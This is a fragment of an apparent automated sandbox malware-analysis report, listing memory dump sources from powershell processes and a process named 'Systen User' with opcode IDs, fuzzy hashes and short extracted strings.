                                                                                                                • Instruction ID: 471e19c8df6e17e4c4bf35c50e499851107f39b979dd820c7b6a454508820e50
                                                                                                                • Opcode Fuzzy Hash: 3af16b196e29d1ab6fc1bc8c1a75330942882030cb1919bda94669fb664202e8
                                                                                                                • Instruction Fuzzy Hash: 4541047140DBC44FD756DB38D8559523FB0FF53260B1506EFD088CB1A7D625A84AC7A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b89b8dc8ca459aae01df53a30c179be92af1ee45b182b196c5704f0df1b9a4a
                                                                                                                • Instruction ID: 28d30da0606bed9f6ad2726b7fd9a902f646e93b7159d6e8937dda245164e3af
                                                                                                                • Opcode Fuzzy Hash: 2b89b8dc8ca459aae01df53a30c179be92af1ee45b182b196c5704f0df1b9a4a
                                                                                                                • Instruction Fuzzy Hash: B121063190C74C8FEB59DBAC984A7E97BF0EB96321F04426BD049C3156DA74A41ACB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 357adb6803d7be79fac95018f79ad2508dc516b4eb58be62b6120bd537d94a47
                                                                                                                • Instruction ID: 0b6aa53b84e1cecb5d7c20b3ffc76e92116f49c937f203ddf10e559d76465fa1
                                                                                                                • Opcode Fuzzy Hash: 357adb6803d7be79fac95018f79ad2508dc516b4eb58be62b6120bd537d94a47
                                                                                                                • Instruction Fuzzy Hash: 03215421A4CBC90FE7AACA1E58942783BE1FF66360B0800BFC48DCB193DC299C04C301
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                • Instruction ID: daa0ff8f57224b30d5b3a69f55305c2e0c4bda254689e9a8e272a9959e17915d
                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                • Instruction Fuzzy Hash: 4C01A73110CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d9be592e21d396ab1543db15efebe7ce9dff073afaa01fdf7300c02c3ca7e790
                                                                                                                • Instruction ID: 0b820259034de794b7a488b40aa5d61523282874e6d2c2a5e67c8ed856af504a
                                                                                                                • Opcode Fuzzy Hash: d9be592e21d396ab1543db15efebe7ce9dff073afaa01fdf7300c02c3ca7e790
                                                                                                                • Instruction Fuzzy Hash: D9F09A32A4CA048FD758EA4CE4008A877E0FF5A36072100FAE11DC75A3CA29EC44C741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ddf2fe482333fe15bf1291ce06b2fc6d900fec9596c7b77c79d43e913ab99ff7
                                                                                                                • Instruction ID: fa7b532a97a0a5c419de6c6249b6fc5c3eae5043bc044de5d85948398d26ecbc
                                                                                                                • Opcode Fuzzy Hash: ddf2fe482333fe15bf1291ce06b2fc6d900fec9596c7b77c79d43e913ab99ff7
                                                                                                                • Instruction Fuzzy Hash: BCF0B832A4C6448FE758EA4CE4408AC77F0FF0A720B5100F6E11DCB4A3DA2AAC54C751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction ID: 389eef69e47aaf2397c4d42e4ea33376506c8ba95024dfde57af40aadd18df55
                                                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction Fuzzy Hash: 89E01A31B4C8099FDA68DA0CE1409AD73E1FB9A36176101BBD14EC7962CA26EC51CB80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: M_^$M_^$M_^$M_^
                                                                                                                • API String ID: 0-1397233021
                                                                                                                • Opcode ID: 31e9ae425a43e887e9d4d43e34db68dd59682c1bf2e54313d523f29983224e67
                                                                                                                • Instruction ID: 2298c5ee6880425f822ef34a007ed1859e75944e4f3639fd1296e86317a19f91
                                                                                                                • Opcode Fuzzy Hash: 31e9ae425a43e887e9d4d43e34db68dd59682c1bf2e54313d523f29983224e67
                                                                                                                • Instruction Fuzzy Hash: A54142A294DAD35FF35786684CA50A97FB0FF52294B0D43F6C099CB0D7F9185407C261
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                                                • API String ID: 0-622050427
                                                                                                                • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                                                                • Instruction ID: 77ecf0fcaeeb1016aecb7c940c5a2843095bfff3a094b78aea33b15f6479d6e8
                                                                                                                • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                                                                • Instruction Fuzzy Hash: F921D7B7A085699ED3027BBDB8046DD3750DF952B478507B2E1AECB093F91860878AE1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d65e5ffef339b4b9aabe441026468cc270f1687afbfb65879a0a5b914d69a04
                                                                                                                • Instruction ID: dcbe4752d82c3ceeb1eab8dafc254d6be79f6f5bd5440fc248324584ee532b07
                                                                                                                • Opcode Fuzzy Hash: 6d65e5ffef339b4b9aabe441026468cc270f1687afbfb65879a0a5b914d69a04
                                                                                                                • Instruction Fuzzy Hash: AAD12331D4DA8A9FE7659B6898155BD7BB0FF06394B0802FED44ECB8D7D918AC05C342
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 366072fa9adaf4e221c83c54a5fa81db7541bb7e533a9fe5c5b70adb7f45b3d9
                                                                                                                • Instruction ID: d8ae6bdaa2948f7efaa1050efcb72026d56931d416195e8f96d075d12c6a064e
                                                                                                                • Opcode Fuzzy Hash: 366072fa9adaf4e221c83c54a5fa81db7541bb7e533a9fe5c5b70adb7f45b3d9
                                                                                                                • Instruction Fuzzy Hash: 5C912E73D4DA974FD302A76CE8A11E97B60FF523A5B0901B7C4AD8A097EE1C34578291
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8e5ee7889f046111dec7f7b9f3e12163c8c739082dff06cb4d65a84f52192c1f
                                                                                                                • Instruction ID: 38e9b6aa587983c6556c71423f32117e415bd76c07f621845294b87ba84178ff
                                                                                                                • Opcode Fuzzy Hash: 8e5ee7889f046111dec7f7b9f3e12163c8c739082dff06cb4d65a84f52192c1f
                                                                                                                • Instruction Fuzzy Hash: 0141EA7191CB888FE7189F5CAC066F97BF0FB69711F04426FE449D3252CA64A856CBC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2402004879.00007FF887C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C0D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887c0d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 50e19dd1b01c5a3c88b31723a615550711ff6b176e36270f5cbcb8f71f24d0f1
                                                                                                                • Instruction ID: 67c3986dd4f3665baecf0ab85b1fad30de3c2cc240a9eb799e7585bf40bfc586
                                                                                                                • Opcode Fuzzy Hash: 50e19dd1b01c5a3c88b31723a615550711ff6b176e36270f5cbcb8f71f24d0f1
                                                                                                                • Instruction Fuzzy Hash: E741227084DBC44FE7569B28D8419623FF1FF53360B1902DFD088CB1A3D629A84AC7A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 274d19aad9edf6f1ce4dc6a70055f7d1db9d87a6fabb5db8e7fe1a681f442e27
                                                                                                                • Instruction ID: 33efe14cf2b2d0551f5e1095eed23391ed026eb3a6213bed09b2f4f6305445ee
                                                                                                                • Opcode Fuzzy Hash: 274d19aad9edf6f1ce4dc6a70055f7d1db9d87a6fabb5db8e7fe1a681f442e27
                                                                                                                • Instruction Fuzzy Hash: 8621363190C74C4FEB58DFAC984A7E97BF0EB96320F04426BD449C3156CA74A80ACB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                • Instruction ID: 3bbbef3d5142eedfdcedc6392593ffb73395c4b7190a8c7020276d550aea8722
                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                • Instruction Fuzzy Hash: 6C01A73111CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3661DA36E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 28719d58a3def7cb7356c9c1a7acdc2641a56555b702edeb94ee86da0a6d7966
                                                                                                                • Instruction ID: 7671e9cbd584f922440e2cd52172da3438d6a6ba61f34f1dd8427a06b96ac0f0
                                                                                                                • Opcode Fuzzy Hash: 28719d58a3def7cb7356c9c1a7acdc2641a56555b702edeb94ee86da0a6d7966
                                                                                                                • Instruction Fuzzy Hash: F1F0BE32A4CA048FD798EB4CE4008AC73F0FF58360B2140BAE01EC71A7CA29EC45C751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 76d22b5c087d7327be69e0f684ee946d91277c7e2a53306e23ae929aff0f4b23
                                                                                                                • Instruction ID: 65fe2cbb8734bf095e5dc2b017bb1695b1ac8dfecbd96c8752d58ed6ffe5962f
                                                                                                                • Opcode Fuzzy Hash: 76d22b5c087d7327be69e0f684ee946d91277c7e2a53306e23ae929aff0f4b23
                                                                                                                • Instruction Fuzzy Hash: 6BF0B832A4C6488FE758EA4CE4408AC77F0FF08324B5500B6E01EDB0A7DA2AAC94C751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction ID: fae55b345ab141f7ce33ebd8f4b5a346c4a0abb438dc3401fdedad8c8421e531
                                                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction Fuzzy Hash: 0AE01A31B4C8088FDAA8DB0CE0409AD73E1FF9837172142B7D14ED7566CA22EC51CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                                                • API String ID: 0-2388461625
                                                                                                                • Opcode ID: 1febeceaada15ff85d2e78f40743ccfef67e4c360237bd4608141d80f364070f
                                                                                                                • Instruction ID: d065f70f907a4e25edb5db904a79f2fdbb5966f27ff4ea256d2dd697e7c81e9b
                                                                                                                • Opcode Fuzzy Hash: 1febeceaada15ff85d2e78f40743ccfef67e4c360237bd4608141d80f364070f
                                                                                                                • Instruction Fuzzy Hash: E921C5B3E145154AC30237FCBC516DC6B81EB553B834501F3E22DCF513D918648B8693
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (0_$8,_$H1_$P/_$p0_$-_$/_
                                                                                                                • API String ID: 0-1780797917
                                                                                                                • Opcode ID: c4392fa172f89a5bb0d22d040b1d8d2f4a8248748434e1e13203b7d976d0d5fd
                                                                                                                • Instruction ID: 96e967f0b8852fdb78d42aef7b2a6d63048f11d244c6e98f40168f2b8aad9938
                                                                                                                • Opcode Fuzzy Hash: c4392fa172f89a5bb0d22d040b1d8d2f4a8248748434e1e13203b7d976d0d5fd
                                                                                                                • Instruction Fuzzy Hash: 4D412962D6E5C14FF31A46742C192796EB1BF12B80B0841BFC0AD470DFCA5CAC1AC796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6B$6B$6B$6B$"rB$0DL$0DL$0DL$8ML
                                                                                                                • API String ID: 0-3591008332
                                                                                                                • Opcode ID: 374bb63dd18171b0541cbb13e7442e1a40ef498f8a1322176453215c826009f6
                                                                                                                • Instruction ID: 6143a8506ad661cae44362859c86ddf6cc4189eda09f0e5cbed564171b66536c
                                                                                                                • Opcode Fuzzy Hash: 374bb63dd18171b0541cbb13e7442e1a40ef498f8a1322176453215c826009f6
                                                                                                                • Instruction Fuzzy Hash: C1427421B18A4A4FE798FB7884597BDB7E2FF98740F544579D44FC328AED2CA8018742
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: r6B
                                                                                                                • API String ID: 0-2624010786
                                                                                                                • Opcode ID: eb5def10e42a6010671cc3077ab90918d8f084e1e2dd906cc19a19612a3dbe9a
                                                                                                                • Instruction ID: 95b9b5d05df64440686ea45b6ced93dde0d05af6507e93bd50cf847d6b6a1826
                                                                                                                • Opcode Fuzzy Hash: eb5def10e42a6010671cc3077ab90918d8f084e1e2dd906cc19a19612a3dbe9a
                                                                                                                • Instruction Fuzzy Hash: 9751F320A5DAC64FE786AB7868643797FE5EF87255B0801FBE08AC71D7DD0C5806C342
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: r6B
                                                                                                                • API String ID: 0-2624010786
                                                                                                                • Opcode ID: 4af74b426b18239b16c7acbf61731f9bc8c2c0fc2a09d3ef17fabf10578f8c5b
                                                                                                                • Instruction ID: 96ffd126415e0fef70fe6516b640b26080e53d2ac1faea4e8141a188c013c6a6
                                                                                                                • Opcode Fuzzy Hash: 4af74b426b18239b16c7acbf61731f9bc8c2c0fc2a09d3ef17fabf10578f8c5b
                                                                                                                • Instruction Fuzzy Hash: 3C31C221F1894A4FE798EB6CA45A378A6D2EF99791F0401BEE00EC32D3DE6C9C418341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6B
                                                                                                                • API String ID: 0-2065085838
                                                                                                                • Opcode ID: de773ccd5fd92bf3bfcabd67762a32a207f5d033eeed1106579865faa3d33b8f
                                                                                                                • Instruction ID: d3eff9ea57c1d768526f8b48c118d6e30396495e86bc20e356c9cd4df2af62ff
                                                                                                                • Opcode Fuzzy Hash: de773ccd5fd92bf3bfcabd67762a32a207f5d033eeed1106579865faa3d33b8f
                                                                                                                • Instruction Fuzzy Hash: 33317561F18A4A4FF784BBBC58593BD77E2FF98641F04427AE01EC3296DE2C99018742
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: HBL
                                                                                                                • API String ID: 0-3574280149
                                                                                                                • Opcode ID: bf4af0127ec4d6591666d3cbe7f8098844052aa82dcd53559760c44e26ee85e8
                                                                                                                • Instruction ID: 8e047aa24e86fd361a011a8742210555cf5c14b1de4cb1b1c7b30b240126a64d
                                                                                                                • Opcode Fuzzy Hash: bf4af0127ec4d6591666d3cbe7f8098844052aa82dcd53559760c44e26ee85e8
                                                                                                                • Instruction Fuzzy Hash: 04318F30E18A0E8FEB49EBA8C4656AD77B2FF98300F544579D01AD328ADE3CA845C751
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8eL
                                                                                                                • API String ID: 0-2915619072
                                                                                                                • Opcode ID: b97df5df90b1a56dad633b7ec0232b1019447141f8dc15e76b2d3e8a1b948ef1
                                                                                                                • Instruction ID: 6f9b34a327874d781bba16b69ee59ac5043e126bbd64bc0d21cf9c7a001fba5a
                                                                                                                • Opcode Fuzzy Hash: b97df5df90b1a56dad633b7ec0232b1019447141f8dc15e76b2d3e8a1b948ef1
                                                                                                                • Instruction Fuzzy Hash: 7701441890DAC30FF781A738581443A7FF1AF91290B0C06BAD889C71AFEC1D9985C382
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d760268ad7cc1bf16affd0cb539d817a776d15ffbe6cab2f019bf6390e83564
                                                                                                                • Instruction ID: d9a4b308b4ef46692c3870f80fec74fd6128ffc975c94d8aa9b4ef9614793235
                                                                                                                • Opcode Fuzzy Hash: 6d760268ad7cc1bf16affd0cb539d817a776d15ffbe6cab2f019bf6390e83564
                                                                                                                • Instruction Fuzzy Hash: 7141E432E18A4B9FE741E7B8D8612EDBBB1FF55290F0802B7C15AD7197DD282846C351
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 92759d1531ddd1dd71a9b280e977660b28ec29cdb4faa279ba6d433f2a771ad3
                                                                                                                • Instruction ID: e0db120019087e57d12846c5ac9c60ba7bbe9f636d69c00545ff7e12b7304cd5
                                                                                                                • Opcode Fuzzy Hash: 92759d1531ddd1dd71a9b280e977660b28ec29cdb4faa279ba6d433f2a771ad3
                                                                                                                • Instruction Fuzzy Hash: D331B321D58A4B9FE741D7A898612EDBFF2FF55240F440276C00AE71DBDD282845C741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b368077cf8c20a9da4a4590c81f1014418606e217890ab3468b529795303b9f3
                                                                                                                • Instruction ID: 5c181fbb5f6a9ab5f869a8be1ba57a397e4444d15448e3fec50499a22c7b028d
                                                                                                                • Opcode Fuzzy Hash: b368077cf8c20a9da4a4590c81f1014418606e217890ab3468b529795303b9f3
                                                                                                                • Instruction Fuzzy Hash: 39514B20A0D7860FE357A778981A2B97FE2EF8765070940FAD48DC7193DD1C9C46C352
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ce35b9f819c05da8c5d7d8eccb708bec8d519d9067223cfc4535be3b29439c6
                                                                                                                • Instruction ID: 6b88e6b80bfed8bfac5bae3ecbebc7096b7ba3221bb83139b24b083de54351b2
                                                                                                                • Opcode Fuzzy Hash: 0ce35b9f819c05da8c5d7d8eccb708bec8d519d9067223cfc4535be3b29439c6
                                                                                                                • Instruction Fuzzy Hash: 0E31B62091864D8FD785F7A8C0A56EC7B73FF88344B8481A5D419C338FDD3C69018762